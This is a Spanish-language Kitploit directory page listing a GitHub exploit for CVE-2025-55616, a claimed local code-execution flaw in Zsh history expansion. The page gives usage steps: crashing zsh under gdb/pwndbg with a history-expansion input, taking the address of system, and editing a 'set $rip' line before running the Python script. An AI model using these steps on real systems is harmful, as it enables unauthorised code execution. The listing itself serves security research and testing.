Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55616 — Exploit para CVE-2025-55616, un RCE local en Zsh mediante expresión de historial, que logra ejecución arbitraria de código con privilegios de usuario. | Kitploit
Herramientas/GitHubGitHub/livepwn/cve-2025-55616
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónRed TeamingExplotación de Binarios
GitHublivepwn/cve-2025-55616

CVE-2025-55616

Exploit para CVE-2025-55616, un RCE local en Zsh mediante expresión de historial, que logra ejecución arbitraria de código con privilegios de usuario.

Ver Repositorio
2hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-55616

Autor: Rana M.Sinan Adil

  • Vulnerabilidad encontrada en Zsh que conduce a RCE mediante History Expression

Puntos clave

Para ejecutar este exploit: solo cambia la dirección IP y el "p system" en el exploit, porque también lo probé en mi segunda laptop, y para cambiarlo ejecuta el siguiente comando en gdb (especialmente en pwndbg):

root@kitploit:~
$ gdb zsh -f (en la terminal)

pwndbg> run -f

username% ! (username será el tuyo, solo escribe ! )

username% !!11111111111 (aquí igual, solo escribe !!11111111111 )

pwndbg> p system

después de obtener la dirección de "p system", solo cámbiala en

la siguiente línea del exploit:

root@kitploit:~
b'set $rip =  0x7ffff7cc9110', (usa tu dirección de p system en lugar de 0x7ffff7cc9110

Descripción

Esta vulnerabilidad permite a atacantes locales lograr Ejecución de Código Arbitrario (RCE) con los privilegios del usuario que ejecuta el proceso de Zsh.

Uso

root@kitploit:~
python3 CVE-2025-55616.py
Descargar herramienta